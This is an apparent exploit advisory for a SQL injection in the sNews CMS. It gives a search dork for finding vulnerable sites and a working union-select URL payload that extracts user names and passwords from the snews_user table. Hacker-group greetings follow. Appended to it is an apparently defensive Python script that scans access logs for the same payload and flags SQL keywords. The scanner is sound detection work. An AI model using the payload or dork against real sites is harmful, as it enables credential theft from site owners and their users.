Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*
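
A defender-side check for the request shape shown in the advisory, as an added example that is not part of the original post: it scans web access logs for `snews.php?act=shownews` requests whose `id` is not a plain number. The log lines are constructed, and treating a numeric `id` as the only legitimate form is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/|/\*.*$", re.S)  # /**/ stands in for spaces
SQL_KEYWORD_RE = re.compile(r"\b(union|select|from|where|concat)\b", re.I)

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] '
    '"GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2013:10:00:05 +0000] '
    '"GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,'
    'concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user'
    '/**/where/**/id%20like%201/* HTTP/1.1" 200 734',
    '192.0.2.10 - - [01/Jan/2013:10:00:09 +0000] '
    '"GET /snews/style.css HTTP/1.1" 200 900',
]


def inspect_line(line):
    """Return None if the line is unremarkable, else a finding for the id value."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if not url.path.endswith("/snews.php") or params.get("act") != ["shownews"]:
        return None
    for value in params.get("id", []):
        if re.fullmatch(r"\d{1,10}", value):
            continue  # plain article number: the only shape assumed legitimate
        # Replace SQL comments with spaces so the analyst sees the real statement.
        normalized = SQL_COMMENT_RE.sub(" ", value).strip()
        keywords = sorted({k.lower() for k in SQL_KEYWORD_RE.findall(normalized)})
        return {"client": line.split()[0], "normalized": normalized,
                "keywords": keywords}
    return None


def scan(lines):
    """Collect findings for every suspicious line."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The allow-list test on `id` is what flags a request; the keyword list only adds triage context and is not relied on for detection.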